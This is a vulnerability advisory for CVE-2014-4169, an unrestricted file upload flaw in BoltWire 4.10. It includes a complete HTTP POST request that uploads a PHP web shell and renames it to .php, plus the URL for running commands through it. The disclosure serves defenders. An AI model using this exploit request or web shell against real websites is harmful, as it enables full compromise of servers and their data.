Total Tests:

Unrestricted Upload of File with Dangerous Type in BoltWire

Advisory ID:HTB23218
Product:BoltWire
Vendor:BoltWire
Vulnerable Versions:4.10 and probably prior
Tested Version:4.10
Advisory Publication:June 11, 2014 [without technical details]
Vendor Notification:June 11, 2014
Vendor Fix:June 19, 2014
Public Disclosure:July 2, 2014
Latest Update:June 19, 2014
Vulnerability Type:Unrestricted Upload of File with Dangerous Type [CWE-434]
CVE Reference:CVE-2014-4169
Risk Level:Critical
CVSSv2 Base Score:10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in BoltWire, which can be exploited to execute arbitrary PHP code on the target system and gain complete control over vulnerable web application.


1) Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169

The vulnerability exists due to insufficient validation of the filename when uploading files in "/index.php" script. A remote authenticated attacker can upload arbitrary file with ".txt" extension and rename it into ".php" using a specially crafted HTTP POST request. Successful exploitation of the vulnerability requires valid user credentials, but registration is open by default to anyone. The vulnerability allows execution of arbitrary PHP code with privileges of the webserver and can lead to complete compromise of the website.

The following dump of the HTTP POST request illustrates the upload of the file named "file.txt" and its renaming into "file.php", with contents, which allows execution of arbitrary system commands:

POST /index.php?p=action.upload HTTP/1.1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------312591666129281
Content-Length: 538

-----------------------------312591666129281
Content-Disposition: form-data; name="boltkey"

9867614
-----------------------------312591666129281
Con tent-Disposition: form-data; name="upload"; filename="file.txt"
Content-Type: text/plain

<?
passthru($_GET['cmd']);
?>



------------------------- ----312591666129281
Content-Disposition: form-data; name="filename"

file.php
-----------------------------312591666129281
C ontent-Disposition: form-data; name="submit"

UPLOAD
-----------------------------312591666129281--


The uploaded file will be accessible using the following URL:

http://[host]/files/file.php?cmd=ls

How to Detect Unrestricted Upload of File with Dangerous Type Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Update to BoltWire 4.11

More Information:
http://www.boltwire.com/index.php?p=downloads


References:
[1] High-Tech Bridge Advisory HTB23218 - https://www.immuniweb.com/advisory/HTB23218 - Unrestricted Upload of File with Dangerous Type in BoltWire.
[2] BoltWire - http://www.boltwire.com/ - BoltWire is an easy to use web development engine with surprizing flexibility and power. It has the various strengths of a wiki, cms, database, search engine, and more, all rolled together into an innovative software system of ground-breaking design.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[6] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a Technical Question?

Our security experts will answer within
one business day. No obligations.

Have a Sales Question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
*
Your data will stay private and confidential